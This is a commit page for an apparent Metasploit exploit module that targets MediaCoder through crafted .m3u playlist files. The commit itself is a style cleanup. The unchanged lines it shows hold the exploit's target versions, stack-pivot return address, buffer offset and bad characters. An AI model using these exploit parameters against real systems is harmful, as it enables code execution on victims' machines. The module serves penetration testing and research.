Skip to content

Commit 1341d6e

Browse files
committed
Remove extra commas and try to keep a line in 100 columns
1 parent 16c9eff commit 1341d6e

File tree

1 file changed

+6
-5
lines changed

1 file changed

+6
-5
lines changed

modules/exploits/windows/fileformat/mediacoder_m3u.rb

Lines changed: 6 additions & 5 deletions
Original file line numberDiff line numberDiff line change
@@ -36,33 +36,34 @@ def initialize(info = {})
3636
],
3737
'DefaultOptions' =>
3838
{
39-
'EXITFUNC' => 'seh',
39+
'EXITFUNC' => 'seh'
4040
},
4141
'Platform' => 'win',
4242
'Payload' =>
4343
{
4444
'Space' => 1200,
4545
'BadChars' => "\x00\x5c\x40\x0d\x0a",
4646
'DisableNops' => true,
47-
'StackAdjustment' => -3500,
47+
'StackAdjustment' => -3500
4848
},
4949
'Targets' =>
5050
[
5151
[ 'MediaCoder 0.8.21 - 0.8.22 / Windows XP SP3 / Windows 7 SP0',
5252
{
53-
'Ret' => 0x6afd4435, # stack pivot (add esp,7ac;pop pop pop pop ret from postproc-52.dll)
53+
# stack pivot (add esp,7ac;pop pop pop pop ret from postproc-52.dll)
54+
'Ret' => 0x6afd4435,
5455
'Offset' => 849,
5556
'Max' => 5000
5657
}
5758
],
5859
],
5960
'Privileged' => false,
60-
'DisclosureDate' => 'Jun 24, 2013',
61+
'DisclosureDate' => 'Jun 24 2013',
6162
'DefaultTarget' => 0))
6263

6364
register_options(
6465
[
65-
OptString.new('FILENAME', [ false, 'The file name.', 'msf.m3u']),
66+
OptString.new('FILENAME', [ false, 'The file name.', 'msf.m3u'])
6667
], self.class)
6768

6869
end

0 commit comments

Comments
 (0)